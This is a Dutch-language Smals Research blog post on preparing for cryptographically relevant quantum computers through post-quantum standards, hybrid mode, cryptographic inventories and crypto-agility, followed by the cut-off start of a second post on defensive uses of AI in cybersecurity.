<p>Cryptografische mechanismes kunnen aan veiligheid inboeten omwille van diverse redenen, gaande van toegenomen computerkracht, doorbraken in cryptoanalyse en &#8211; dit is waar we ons vandaag het meeste zorgen over maken &#8211; de mogelijkheid om krachtige kwantumcomputers te bouwen.&nbsp;</p>



<h2 class="wp-block-heading">Rekenkracht</h2>



<p>Een eerste reden is de toename aan beschikbare rekenkracht op klassieke computers. In 1977 werd <a href="https://en.wikipedia.org/wiki/Data_Encryption_Standard">DES</a> (Date Encryption Standard) gestandaardiseerd. DES bood een veiligheid van 56 bit, wat wil zeggen dat een aanvaller op zoek gaat naar de sleutel in een zoekruimte met 2<sup>56</sup>&nbsp; (72 miljoen miljard) mogelijkheden. Onder meer door de exponentiële toename van de beschikbare rekenkracht, is vandaag, overeenkomstig de <a href="https://en.wikipedia.org/wiki/Moore%27s_law">wet van Moore</a>, minimum 128 bit security vereist. &nbsp;</p>



<p>Vandaag wordt RSA-2048 nog vaak gebruikt voor onder meer authenticatie, sleuteluitwisseling en elektronische handtekeningen. Het is vandaag nog steeds op een deel van de actieve Belgische elektronische identiteitskaarten aanwezig. Met de 112 bit security die het biedt is het niet meteen onveilig, maar wordt het wel best uitgefaseerd. Sowieso is het geen goed idee om het in nieuwe systemen te adopteren.</p>



<h2 class="wp-block-heading">Cryptoanalyse</h2>



<p>Een tweede reden dat cryptografische mechanismes aan veiligheid kunnen inboeten zijn doorbraken in cryptoanalyse. Cryptoanalyse is de kunst om zwakheden te vinden in cryptografische methodes. Het was cruciaal in de 2<sup>e</sup> wereldoorlog om <a href="https://en.wikipedia.org/wiki/Enigma_machine" data-type="link" data-id="https://en.wikipedia.org/wiki/Enigma_machine">Enigma</a> te kraken, wat het Nazi commando voorheen toeliet veilig met hun duikboten te communiceren. Met behulp van differential cryptanalysis kon ook de veiligheid van DES gereduceerd worden van 56 naar 47 bits. Ook recenter blijft cryptoanalyse een rol spelen. In 2008, bijvoorbeeld slaagde men erin een <a href="https://blog.mozilla.org/security/2008/12/30/md5-weaknesses-could-lead-to-certificate-forgery/">vals TLS certificaat</a> te genereren doordat de onderliggende cryptografische hashfunctie, MD5, onveilig geworden was door cryptoanalytische doorbraken.</p>



<h2 class="wp-block-heading">Cryptografisch Relevante Kwantumcomputers</h2>



<p>Ten derde is er de dreiging van kwantumcomputers die jaar na jaar krachtiger worden en op termijn alle moderne publieke sleutelcryptografie onveilig kunnen maken. &nbsp;Dit zou resulteren in een situatie waarbij digitale handtekeningen, publieke-sleutel authenticatie, TLS verbindingen, etc. allen volstrekt onveilig worden. Men refereert doorgaans naar zo’n machines als <em>cryptografisch relevante kwantumcomputers</em>.</p>



<p>Niemand weet echt wanneer (en of) men in staat zal zijn dergelijke kwantumcomputers te bouwen. Zelfs de meningen onder experten zijn sterk verdeeld, zoals te zien is op onderstaande figuur, waarbij in 2021 46 experten geïnterviewd werden. Wel was de helft van de experten van oordeel dat er een kans was van minstens 50% dat er binnen 15 jaar – dus tegen 2036 – zo’n kwantumcomputer gebouwd zal worden.</p>



<figure class="wp-block-image size-full"><a href="/wp-content/uploads/2024/08/image-2.png"><img decoding="async" width="975" height="638" src="/wp-content/uploads/2024/08/image-2.png" alt="" class="wp-image-21120" srcset="https://www.smalsresearch.be/wp-content/uploads/2024/08/image-2.png 975w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-2-300x196.png 300w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-2-768x503.png 768w" sizes="(max-width: 975px) 100vw, 975px" /></a><figcaption class="wp-element-caption"><em>Bron: M. Mosca and M. Piani, “2021 quantum threat timeline report,” Global Risk Institute, Toronto, ON, 2022.</em></figcaption></figure>



<p>Dit wil overigens niet zeggen dat we nog een kleine tien jaar kunnen wachten. Een aanvaller kan namelijk vandaag vercijferde communicatie onderscheppen en bewaren. Wanneer de aanvaller een aantal jaar later de beschikking heeft over een cryptografisch relevante kwantumcomputer kan hij of zij alsnog de data ontcijferen, die dan nog steeds gevoelig kan zijn. Dit wordt de <a href="https://en.wikipedia.org/wiki/Harvest_now,_decrypt_later"><em>harvest now decrypt later</em></a> aanval genoemd.</p>
<p>Het BSI, het Duitse cybersecurityagentschap <a href="https://pkic.org/events/2023/pqc-conference-amsterdam-nl/pkic-pqcc_stephan-ehlen_bsi_post-quantum-policy-and-roadmap-of-the-bsi.pdf">raadt</a> aan om ervan uit te gaan dat cryptografisch relevante kwantumcomputers beschikbaar zullen zijn tegen het begin van het volgend decennium en om dit vandaag reeds mee te nemen in risicobeoordelingen. Dit is dus geen voorspelling, maar een conservatieve richtlijn voor risicobeoordeling.</p>



<h1 class="wp-block-heading">Nieuwe standaarden en vertrouwen</h1>



<p>Et is dus een aanzienlijk risico dat in de niet zo heel verre toekomst cryptografisch relevante kwantumcomuters gebouwd zullen worden. Gelukkig loopt er bij het NIST (National Institute for Standards and Technologies) sinds 2016 een procedure om <strong>post-quantum cryptografie (PQC)</strong> te standaardiseren. Het bestaat uit twee luiken:</p>



<ul class="wp-block-list">
<li><strong>Key encapsulation</strong> laat twee partijen toe om een gedeelde sleutel overeen te komen waarmee de uit te wisselen data vercijferd wordt.</li>



<li><strong>Digitale handtekeningen</strong> laten onder meer toe om documenten elektronisch te ondertekenen en om partijen te authenticeren.</li>
</ul>



<p>In augustus 2024 <a href="https://csrc.nist.gov/News/2024/postquantum-cryptography-fips-approved">publiceerde</a> het NIST de eerste standaarden:</p>



<ul class="wp-block-list">
<li><a href="https://csrc.nist.gov/pubs/fips/203/final">ML-KEM</a>, gebaseerd op <a href="https://pq-crystals.org/kyber/index.shtml">CRYSTALS-KYBER</a>, is de eerste kwantumresistente standaard voor key encapsulation.</li>



<li><a href="https://csrc.nist.gov/pubs/fips/204/final">ML-DSA</a><em>, </em>gebaseerd op <a href="https://pq-crystals.org/dilithium/">CRYSTALS-Dilithium</a> en <a href="https://csrc.nist.gov/pubs/fips/205/final">SLH-DSA</a>, gebaseerd op <a href="https://sphincs.org/">Sphincs+</a>, zijn de twee eerste kwantumresistente standaarden voor digitale handtekeningen. Een derde standaard zit nog in de pijplijn. De toekomstige standaard FN-DSA, gebaseerd op <a href="https://falcon-sign.info/">Falcon</a>, wordt in de komende maanden gepubliceerd.&nbsp;</li>
</ul>



<p>In een <a href="https://eur06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwebsite.smalsrech.be%2Fde-weg-richting-kwantumresistente-standaarden%2F&amp;data=05%7C02%7Ckristof.verslype%40smals.be%7Cd43e2c6b325941e926e108dce8784dd1%7C578bcd46a26646edac84b52b4ebacd22%7C0%7C0%7C638640850615331798%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C0%7C%7C%7C&amp;sdata=TQbqOWNiL%2BAE%2F325gQzV734Jnu14SGtYkb1lZQd%2Fpbo%3D&amp;reserved=0">eerdere blogpost</a> geef ik alvast een idee onder meer van de performantie die we kunnen verwachten, alsook van de groottes van sleutels en digitale handtekeningen.</p>



<p>In de Verenigde Staten zet men alvast volop in op deze nieuwe standaarden, zoals ook blijkt uit de <a href="https://www.congress.gov/bill/117th-congress/house-bill/7535">Quantum Computing Cybersecurity Preparedness Act</a> die in december 2022 door president Biden ondertekend werd. Daarin wordt gesteld dat federale agentschappen binnen de zes maand een strategie moeten ontwikkelen voor hun migratie naar kwantumresistente cryptografie.</p>



<p>In Europa is men wat voorzichter. Het BSI, het toonaangevende Duitse cybersecurityagentschap, stelt:</p>



<p><em>The quantum-safe algorithms that are currently being standardized are not yet as well researched as the &#8220;classical&#8221; methods (for example RSA and ECC). This applies in particular to weaknesses that largely only become apparent in applications, such as typical implementation errors, possible side-channel attacks, etc. BSI therefore recommends that post-quantum cryptography should not be used in isolation if possible, but only in hybrid mode, i.e. in combination with classical algorithms.</em></p>



<p>Dit is een terechte redenering. Eind 2016 startte het NIST, zoals eerder aangegeven, een standaardisatieprocedure voor een nieuwe generatie, kwantumresistente publieke sleutelcryptografie. Tegen november 2017 werden 82 kandidaat algoritmes ingestuurd. SIKE was één van de acht kandidaat algoritmes die tot de finalisten behoorden. In 2022 &#8211; dus vijf jaar later &#8211; vond de COSIC onderzoeksgroep aan de KU Leuven een fundamentele zwakte, waardoor vercijfering m.b.v. SIKE in een paar minuten op een klassieke computer <a href="https://www.esat.kuleuven.be/cosic/blog/an-efficient-key-recovery-attack-on-sidh/">gebroken</a> kon worden. Al die jaren bleef deze zwakte onder de radar van de wereldwijde cryptoanalyse community. We willen het scenario vermijden waarbij we massaal overschakelen naar een nieuw cryptografisch mechanisme, dat dan blijkbaar toch niet zo veilig is als aangenomen. Bovendien kunnen de nog jonge implementaties van deze algoritmes kwetsbaarheden bevatten.</p>



<p>Het zal dus nog wat tijd kosten om voldoende vertrouwen in de nieuwe standaarden en hun implementies te ontwikkelen.</p>



<h1 class="wp-block-heading">Hybride modus</h1>



<p>Het BSI stelt dus voor om initieel in hybride modus te werken, wat wil zeggen dat klassieke publieke sleutelcryptografie in tandem gebruikt wordt met kwantumresistente cryptografie. Wanneer één van beide algoritmes onveilig blijkt te zijn, is er niets aan de hand zolang het&nbsp;andere algoritme nog veilig is. Het biedt dus een dubbele beschermlaag.</p>



<p>Laat ons even concreet bekijken hoe dit in zijn werk gaat. Om een veilig communicatiekanaal op te zetten, moeten twee partijen een gedeelde sleutel afspreken. Dit is één van de stappen in het TLS protocol. Vandaag wordt daarvoor vaak de <a href="https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange">Diffie-Hellman key exchange</a> methode gebruikt. X25519 is daar een concrete instantiatie van, gebaseerd op de elliptische kromme <a href="https://en.wikipedia.org/wiki/Curve25519">Curve25519</a>. Diffie-Hellman is helaas niet opgewassen tegen cryptografisch relevante kwantumcomputers. De nieuwe standaard ML-KEM, gebaseerd op CRYSTALS-KYBER, wordt verondersteld dit wel te zijn. In onderstaande figuur spreken de client en de server in parallel twee gedeelde sleutels af; de oranje sleutel wordt afgesproken met X25519, de groene met CRYSTALS-KYBER. Die twee sleutels worden vervolgens gecombineerd tot één sleutel, waarmee vervolgens de uitgewisselde data vercijferd en ontcijferd zal worden.</p>



<figure class="wp-block-image size-full is-resized"><a href="/wp-content/uploads/2024/08/image-3.png"><img loading="lazy" decoding="async" width="975" height="706" src="/wp-content/uploads/2024/08/image-3.png" alt="" class="wp-image-21122" style="width:840px;height:auto" srcset="https://www.smalsresearch.be/wp-content/uploads/2024/08/image-3.png 975w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-3-300x217.png 300w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-3-768x556.png 768w" sizes="auto, (max-width: 975px) 100vw, 975px" /></a><figcaption class="wp-element-caption"><em>Client en de server spreken in parallel twee gedeelde sleutels af; de oranje sleutel wordt afgesproken met het X25519 algoritme, de groene met het CRYSTALS-KYBER algoritme. Die twee sleutels worden vervolgens gecombineerd tot één sleutel waarmee vervolgens de uitgewisselde data vercijferd en ontcijferd zal worden</em></figcaption></figure>





<h1 class="wp-block-heading">Cryptographic Governance</h1>



<p>Er zijn verschillende cryptografische mechanismes die ooit populair waren, maar vandaag onveilig zijn. Voorbeelden zijn DES, 3DES, MD5 en SHA1. Migratie van oude naar nieuwe cryptografie is dus een gegeven waar we rekening mee moeten houden. Bovendien heeft de geschiedenis ondertussen aangetoond dat volledige cryptografische migraties, zoals die van 3DES naar AES, <a href="https://www.esat.kuleuven.be/cosic/blog/rwc-2022-where-is-the-research-on-cryptographic-transition-and-agility/">tien jaar</a> kunnen aanslepen en best veel resources vergen. Een cryptografische migratie is dan ook een lastig en moeilijk traject.</p>



<p>Een hybride modus resulteert bovendien meteen in twee toekomstige migraties. In eerste instantie wordt gemigreerd van de huidige publieke sleutelcryptografie naar hybride modus. Eens voldoende vertrouwen ontwikkeld is in de nieuwe standaarden en hun implementaties, wordt vervolgens gemigreerd naar uitsluitend kwantumresistente cryptografie.</p>



<p>Een gedegen cryptographic governance helpt ons alvast bij het detecteren waar migraties het dringends zijn, alsook bij het uitvoeren van de migratie zelf. Cryptographic governance laat een organisatie toe te begrijpen waar en hoe cryptografie gebruikt wordt en om veranderingen zoals migraties uit te voeren en te monitoren. Het bestaat uit onder meer onderstaande puzzelstukjes:</p>



<ul class="wp-block-list">
<li>De <strong>cryptografische inventaris</strong> biedt een overzicht van welke cryptografische mechanismes met welke parameters (vb. sleutellengte) gebruikt worden, voor welk doel (vb. bescherming data in transit), waar en om welke data te beschermen (vb. medische persoonsgegevens).</li>



<li>Concrete <strong>cryptografische aanbevelingen</strong>; welke cryptografische algoritmes en parameters (vb. sleutellengtes)&nbsp; zijn veilig, welke dienen uitgefaseerd te worden, welke zijn onveilig, … Dergelijke aanbevelingen zijn reeds aanwezig binnen Smals en zijn tot stand gekomen dankzij Smals Research. Gegeven de dreiging die uitgaat van krachtige kwantumcomputers, is het waarschijnlijk dat de klassieke publieke sleutelcryptografie die vandaag aanbevolen wordt in de niet zo verre toekomst uitgefaseerd zal moeten worden.</li>



<li><strong>Documentatie van de uitzonderingen</strong>. Om communicatie met externe systemen (vb. van klanten of aanbieders van diensten) niet de facto onmogelijk te maken, kunnen <em>tijdelijk</em> uitzonderingen op de cryptografische aanbevelingen getolereerd worden. Dergelijke uitzonderingen dienen te worden gedocumenteerd; het risico wordt beschreven, de scope, het tijdsvenster en de goedkeuring (acceptatie) van het risico door het management.</li>



<li><strong>Crypto agility guidance</strong> moet project teams ondersteuning bieden bij het bouwen en aanpassen van toepassingen en diensten volgens de principes van cryptographic agility. Dat wil zeggen op zo’n manier dat rekening gehouden wordt met toekomstige cryptografische migraties.</li>



<li>Een <strong>cryptografische policy</strong> is nodig om te vermijden dat de cryptografische aanbevelingen als vrijblijvende suggesties geïnterpreteerd worden en geeft hen dus een dwingend karakter. De cryptografische policy van Smals verwijst inderdaad naar onze aanbevelingen. Een cryptografische policy leidt tot een vereenvoudiging (uniformisering) van het crypto landschap binnen de organisatie. Het kan richting geven aan de migratie naar kwantumresistente standaarden, en de bouw van applicaties en diensten op een crypto-agile manier stimuleren.</li>



<li><strong>Cryptographic monitoring</strong>. Door het observeren van netwerkverkeer, kunnen we een inzicht krijgen in welke cryptografische mechanismes waar gebruikt worden en kan het helpen bij het uitvoeren van migraties. Dergelijke monitoring vereist gelukkig geen toegang tot de data in transit zelf. &nbsp;</li>
</ul>



<p>In het bijzonder over de cryptogafische inventaris en crypto-agility wil Smals Research zich in de komende periode een scherper beeld vormen. Het is vandaag inderdaad zo dat de principes van crypto-agility en het idee van de cryptografische inventaris er wel zijn, maar dat de concrete uitwerking helaas nog wat ontbreekt, niet enkel bij Smals, maar wereldwijd. In het algemeen is er dus nog <a href="https://dl.acm.org/doi/pdf/10.1145/3567825">werk</a> aan de winkel.</p>



<h1>Cryptografische inventaris</h1>
<p>Een cryptografische inventaris kan een overzicht bieden van onder meer:</p>
<ul>
<li>welke cryptografische mechanismes gebruikt worden. Bijvoorbeeld <a href="https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm">ECDSA</a> om digitale handtekeningen te plaatsen of <a href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES</a> voor bulk vercijfering.</li>
<li>welke parameters daarbij gebruikt worden. ECDSA kan bijvoorbeeld gebruik maken van de elliptische kromme <a href="https://csrc.nist.gov/csrc/media/events/workshop-on-elliptic-curve-cryptography-standards/documents/papers/session6-adalier-mehmet.pdf">P-256</a> en AES kan ingezet worden in <a href="https://en.wikipedia.org/wiki/Galois/Counter_Mode">GCM</a> modus met sleutels met een lengte van 256 bits.</li>
<li>welke cryptografische libraries&nbsp;of services daarbij gebruikt worden. Voorbeelden van libraries zijn&nbsp;<a href="https://www.bouncycastle.org/">BouncyCastle</a> 1.78, en <a href="https://www.openssl.org/">OpenSSL</a> 3.0. Voorbeelden van services zijn de <a href="/basisprincipes-voor-een-moderne-pseudonimiseringsdienst/">blinde pseudonimiseringsdienst</a> van eHealth en <a href="https://aws.amazon.com/cloudhsm/">AWS CloudHSM</a>.&nbsp;</li>
<li>welke data er beschermd wordt en met welk doel. Bijvoorbeeld integriteit en confidentialiteit van&nbsp; medische data at rest.</li>
<li>Waar in de code gebruik gemaakt wordt van cryptografie. In de klasse <em>AbcSigner</em> van regel 254 tot regel 269.</li>
</ul>
<p>Samengevat laat de cryptografische inventaris ons toe snel te lokaliseren waar zwakheden of mogelijke zwakheden zich lokaliseren en waar dus updates of migraties moeten gebeuren.</p>
<p>De inventaris is geen eenmalige oefening maar moet steeds geactualiseerd blijven. Discovery tools, zoals onder meer <a href="https://quantumxc.com/blog/nist-updates-pqc-guidance-cryptographic-discovery-using-cipherinsights-from-quantum-xchange/">CipherInsights</a>, <a href="https://mediacenter.ibm.com/media/IBM+Quantum+Safe+Explorer/1_f4wlr4lb">IBM Quantum Safe Explorer</a>, <a href="https://www.infosecglobal.com/products/agilesec-analytics">AgileSec Analytics</a> en <a href="https://qryptocyber.com/qryptodiscover/">QryptoDiscover</a>, kunnen ons helpen bij zowel het opbouwen als het up-to-date houden.&nbsp;</p>
<p>Zo’n inventaris kan veel details bevatten en, zeker voor wat grotere organisaties, erg complex worden. Het samenstellen en up-to-date houden dreigt dus een erg resource-intensieve operatie te worden. Bovendien maakt een organisatie gebruik van onder meer cryptografische libraries, cryptografische services, hardware van derden, etc. Er is dus nood aan een gestructureerde, gestandaardiseerde manier om een cryptografische inventaris uit te drukken, die automatisering en integratie faciliteert. Dit is waar IBM aan werkt met hun <a href="https://research.ibm.com/blog/cryptographic-bill-of-materials">CBOM</a> (cryptography Bill of Materials). We hopen alvast dat dit snel geadopteerd zal worden.</p>
<p>Een cryptografische inventaris zou alvast een aantal voordelen bieden, naast de migratie naar kwantumresistente cryptografie:</p>
<h2>Security &amp; resilience</h2>
<p><em>Crypto risico</em> is de mogelijkheid dat de organisatie schade ondervindt wanneer cryptografie niet doet wat het hoort te doen, onder meer door gebruik van verouderde cryptografische mechanismes of onveilige parameters, door gebrekkig sleutel- en certificaatbeheer of kwetsbaarheden in implementaties van cryptografische algoritmes. In de <a href="https://owasp.org/Top10/">OWASP top 10</a>, een awareness document voor ontwikkelaars en webapplicatiebeveiliging, staat ‘<em>cryptographic failures</em>’ op de tweede plaats. Voorbeelden zijn de <a href="https://www.bbc.com/news/world-us-canada-49159859">$150M+ Capital One hack</a> waarbij persoonsgegevens van miljoenen gebruikers gecompromitteerd werden ten gevolge van een sleutelbeheerprobleem, en de <a href="https://www.pcmag.com/news/it-turns-out-marriott-wasnt-using-encryption-before-huge-data-breach">$200M+ Marriott Hotel hack</a> waarbij door het onvolledig gebruik van encryptie miljoenen paspoortnummers openbaar werden. De cryptografische inventaris, eventueel aangevuld met cryptographic monitoring, maakt cryptografische risico’s inzichtelijk en helpt zo gelijkaardige incidenten te voorkomen. Crypto agility moet ons dan weer toelaten snel te migreren naar veilige cryptografie.</p>
<h2>Compliance</h2>
<p>Mede als gevolg van dergelijke incidenten stellen auditors zich hoe langer hoe minder tevreden met opervlakkige informatie over het gebruik van cryptografie. Een cyptografische inventaris, eventueel aangevuld met logs van cryptographic monitoring, biedt hen de mogelijkheid om vlot toegang te krijgen tot alle details omtrent het gebruik van cryptografie in de organisatie.</p>
<p>Het is dan ook logisch dat het hebben en onderhouden van een cryptografische inventaris meer en meer aanbevolen of zelfs opgelegd wordt. In de gemeenschappelijke publicatie door NSA, NIST en CISA&nbsp; <a href="https://www.cisa.gov/sites/default/files/2023-08/Quantum%20Readiness_Final_CLEAR_508c%20%283%29.pdf">Quantum readiness: Migration To Post-quantum Cryptography</a> lezen we bijvoorbeeld<em>:</em></p>
<p><em>&nbsp;</em>“<em>Organizations should create a cryptographic inventory that offers visibility into how the organization leverages cryptography in its IT (Information Technology) and OT (Operational Technology) systems.&nbsp;</em>“</p>
<p>Compliance wordt vooral interessant wanneer de cryptografische inventaris naast gedetailleerde cryptografische aanbevelingen gelegd kan worden. Dat laatste is, zoals reeds vermeld, reeds aanwezig binnen Smals dankzij Smals Research.</p>



<h1 class="wp-block-heading">Crypto-agility</h1>



<p>Een crypto inventaris is een noodzakelijke stap richting cryptographic agility, of kortweg crypto-agility. Het is het vermogen om cryptografische mechanismes, zowel in software, hardware als infrastructuur, te vervangen en aan te passen, zonder dat daarbij de correcte werking van het systeem zelf onderbroken wordt. Op die manier kunnen oudere cryptografische mechanismes uitgefaseerd worden en nieuwere geadopteerd.</p>



<p>Hoewel de definitie van cryptographic agility niet altijd eenduidig is, lijkt onderstaande <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4709806">definitie</a>, bestaande uit drie aspecten, vrij accuraat.</p>



<ul class="wp-block-list">
<li>Het vermogen van systemen om hun beveiligingsalgoritmen af te spreken in real-time en op basis van hun gecombineerde <a href="https://csrc.nist.gov/glossary/term/security_functions">beveiligingsfuncties</a> (dit is de hardware, software en firmware die gebruikt wordt om de veiligheid van een systeem te waarborgen);</li>



<li>Het vermogen om nieuwe cryptografische functies of algoritmen toe te voegen aan bestaande hardware of software, wat resulteert in nieuwe, sterkere beveiligingsfuncties;</li>



<li>Het vermogen om cryptografische systemen die kwetsbaar of verouderd zijn geworden, op een elegante manier uit te doven.</li>
</ul>



<p>Hoe we cryptographic agility meer concreet in de praktijk kunnen brengen en wat de uitdagingen daarbij zijn is voer voor een toekomstig artikel. Wel kan TLS ons alvast inspireren. TLS is een cryptografisch protocol dat is ontworpen om veilige communicatie tussen twee partijen via een computernetwerk mogelijk te maken. Beide partijen spreken met elkaar af welke cryptografische mechanismes ze willen gebruiken voor authenticatie, key exchange, encryptie en hashing. Elke partij ondersteunt enkel die mechanismes die het veilig acht. Dit staat beschreven in een configuratiebestand, wat ons toelaat nieuwe cryptografische mechanismes toe te voegen en oude uit te faseren zonder de werking van de bovenliggende applicatie te beïnvloeden.</p>



<h1 class="wp-block-heading">Conclusie</h1>



<p>Kwantumcomputers worden cryptografisch relevant genoemd wanneer ze voldoende krachtig zijn om de moderne publieke sleutelcryptografie te breken. We staan daar vandaag nog ver van af en er is heel veel onzekerheid. We weten zelfs niet of de mensheid ooit in staat zal zijn om dergelijke machines te bouwen. Toch is het verstandig om het zekere voor het onzekere te nemen en ons daarop voor te bereiden.</p>



<p>De dreiging die momenteel uitgaat van kwantumcomputers en de publicatie van de nieuwe kwantumresistente cryptografische standaarden is dan ook een goede aanleiding om ons een algemenere vraag te stellen: hoe kunnen we onze cryptographic governance matuurder maken, zodat we</p>



<ol class="wp-block-list">
<li>een beter inzicht krijgen in welke cryptografie er binnen en door de organisatie gebruikt wordt en</li>



<li>in staat zijn om relatief vlot te migreren indien nodig. </li>
</ol>



<p>Dit is relevant, los van de dreiging die uitgaat van krachtige kwantumcomputers. </p>



<p>Smals is vandaag reeds bezig met die voorbereiding. We beschikken reeds over cryptografische aanbevelingen en een cryptografische policy.&nbsp;Maar er is meer nodig, onder meer een cryptografische inventaris en een adoptie van crypto-agility. Dit zijn elementen waar Smals Research de komende periode rond zal werken.</p>



<p>Er zijn vandaag nog heel wat vragen en onduidelijkheden, wat ons niet mag weerhouden reeds in actie te schieten. We gaan er trouwens van uit dat de publicatie van de nieuwe standaarden door het NIST alles in een stroomversnelling zal brengen.</p>



<p>Samengevat en ter afronding <a href="https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Crypto/Marktumfrage_EN_Kryptografie_Quantencomputing.html">citeer</a> ik Dr. Schabhüser, vice president van de Duitse BSI:</p>



<p><em>“Indien ik bedrijven en organisaties drie adviezen kon geven, zou het zijn</em></p>



<ul class="wp-block-list">
<li><em>Integreer het risico in je risk management systeem</em></li>



<li><em>Creër een crypto inventaris</em></li>



<li><em>Implementeer en gebruik crypto-agility&#8221;</em></li>
</ul>



<p><strong>Aarzel niet ons te contacteren voor meer informatie of eventuele samenwerking.</strong></p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p><em>Dit is een ingezonden bijdrage van Kristof Verslype, cryptograaf bij Smals Research. Het werd geschreven in eigen naam en neemt geen standpunt in namens Smals.</em></p>



<p>Featured image by <a href="https://flickr.com/photos/mshehan/">Michael Shehan Obeysekera</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Defensieve AI</title>
		<link>https://www.smalsresearch.be/defensieve-ai/</link>
		
		<dc:creator><![CDATA[Fabien A. P. Petitcolas]]></dc:creator>
		<pubDate>Thu, 23 May 2024 09:08:13 +0000</pubDate>
				<category><![CDATA[[NL]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">/?p=20525</guid>

					<description><![CDATA[In dit artikel bespreken we, na enkele algemene overwegingen, gebieden van cyberdefensie die baat hebben of zouden kunnen hebben bij AI, zoals intelligentie over cyberaanvallen, detectie en identificatie van cyberaanvallen en reactie op cybersecurity incidenten.]]></description>
										<content:encoded><![CDATA[
<p><a href="/lia-defensive/"><em>Version en français</em></a></p>
<p>In een <a href="/ai-en-cyberbeveiliging/">vorig artikel</a> hebben we kort uitgelegd wat er achter de term &#8216;artificiële intelligentie&#8217; schuilgaat door enkele basistechnieken te beschrijven die worden gebruikt in cybersecurity. In een <a href="/offensieve-ai/">tweede artikel</a> hebben we een kijkje genomen naar het gebruik van AI om aanvallen op computersystemen te vergemakkelijken. We hebben in het bijzonder beschreven hoe AI verschillende aanvalsvectoren kan wijzigen of al wijzigt.</p>
<p>In het laatste artikel van deze serie bespreken we, na enkele algemene overwegingen, gebieden van cyberdefensie die baat hebben of zouden kunnen hebben bij AI, zoals intelligentie over cyberaanvallen, detectie en identificatie van cyberaanvallen en reactie op cybersecurity incidenten.</p>
<h1 class="wp-block-heading">Inleiding</h1>
<p>Al in 2018 meende Schneier <a href="#_ref1">[1]</a> dat cyberdefensie meer zou profiteren van AI-technieken dan cyberaanval, omdat defensie volgens hem in een slechtere positie verkeert dan aanval, juist vanwege de grote menselijke componenten. Bovendien voorspelde hij dat tegenstanders hun aanvalsstrategie zouden blijven verbeteren door middel van automatisering, zodat de enige effectieve manier om deze aanvallen op machinesnelheid te verzwakken zou zijn door middel van automatisering. Deze stelling wordt ook verdedigd door Sarker et al. <a href="#_ref2">[2]</a> die stellen dat AI een revolutie teweeg kan brengen op het gebied van cybersecurity, niet alleen door op grote schaal taken te <em>automatiseren</em>, maar ook door <em>menselijke experts te helpen</em> een situatie beter te begrijpen en beslissingen te nemen in echte scenario&#8217;s.</p>
<p>Het adviesbureau Gartner verwacht dat AI zal bijdragen aan een vermindering van 30% van het percentage vals-positieven bij het testen van toepassingen en het opsporen van bedreigingen voor 2027 <a href="#_ref3">[3]</a>. De nieuwe tools die onlangs zijn aangekondigd door toonaangevende bedrijven in de markt, waaronder CrowdStrike, zouden volgens Gartner inderdaad kunnen helpen om de productiviteit en vaardigheden van beheerders te verbeteren. Er is geen tekort aan ideeën, maar zoals de auteurs van de nota van het adviesbureau aangeven, bestaan de zoek- en analysefunctionaliteiten al, en wat nieuw is, is in wezen de interactiviteit tussen de menselijke analisten en de machine.</p>
<p>Taddeo et al. <a href="#_ref4">[4]</a> temperen de hype in AI voor cyberdefensie door erop te wijzen dat het vertrouwen in AI voor de <em>robuustheid, veerkracht en respons</em> van cybersecuritysystemen onterecht is en dringen erop aan dat een vorm van controle noodzakelijk is om beveiligingsrisico&#8217;s te beperken. De auteurs gebruiken de term <em>vertrouwen</em> in zijn puurste betekenis: een beslissing om te delegeren, zonder enige vorm van controle of toezicht, een acceptatie van een risico op afhankelijkheid. Ze wijzen op het gebrek aan transparantie van AI en de evolutie van een AI-systeem in de tijd als belangrijke beperkingen en bevelen in het bijzonder een “in-house” implementatie aan voor kritieke nationale infrastructuren en voortdurende monitoring van het AI-systeem en de evolutie ervan.</p>
<p>Dasgupta et al. <a href="#_ref5">[5]</a> hebben de meeste recente publicaties over het gebruik van AI op het gebied van cybersecurity beoordeeld. Volgens hen blijft een cruciaal punt de prestaties (in termen van reactiesnelheid, maar ook vermindering van het aantal fout-positieven en fout-negatieven) van detectietools, die grote gevolgen kunnen hebben voor het systeem waarin ze worden ingezet.</p>
<p>In de volgende paragrafen gaan we dieper in op verschillende gebieden van cyberdefensie die baat kunnen hebben bij AI.</p>
<h1 class="wp-block-heading">Intelligentie over cyberaanvallen</h1>
<p>Inlichtingen over cyberbedreigingen is het proces van het verzamelen, analyseren en verspreiden van informatie over huidige en opkomende cyberbedreigingen, zoals actoren, doelwitten, technieken, tools, enz. Deze informatie kan organisaties helpen zich proactief te verdedigen tegen cyberaanvallen door beveiligingsteams tijdig van bruikbare informatie te voorzien.</p>
<p>Tegenwoordig wordt <em>Open Source Intelligence</em> (OSINT) op grote schaal gebruikt door overheden en inlichtingendiensten om cybercriminaliteit te onderzoeken en te bestrijden <a href="#_ref6">[6]</a>. Het hoofddoel van het Europese DiSIEM-project<a href="#_ftn1" name="_ftnref1"><sup>1</sup></a> was om verschillende bronnen van OSINT-gegevens te integreren in SIEM-systemen (<em>Security Information and Event Management</em>) om te helpen reageren op nieuw ontdekte kwetsbaarheden in de infrastructuur of zelfs om mogelijke opkomende bedreigingen te voorspellen<a href="#_ftn2" name="_ftnref2"><sup>2</sup></a>.</p>
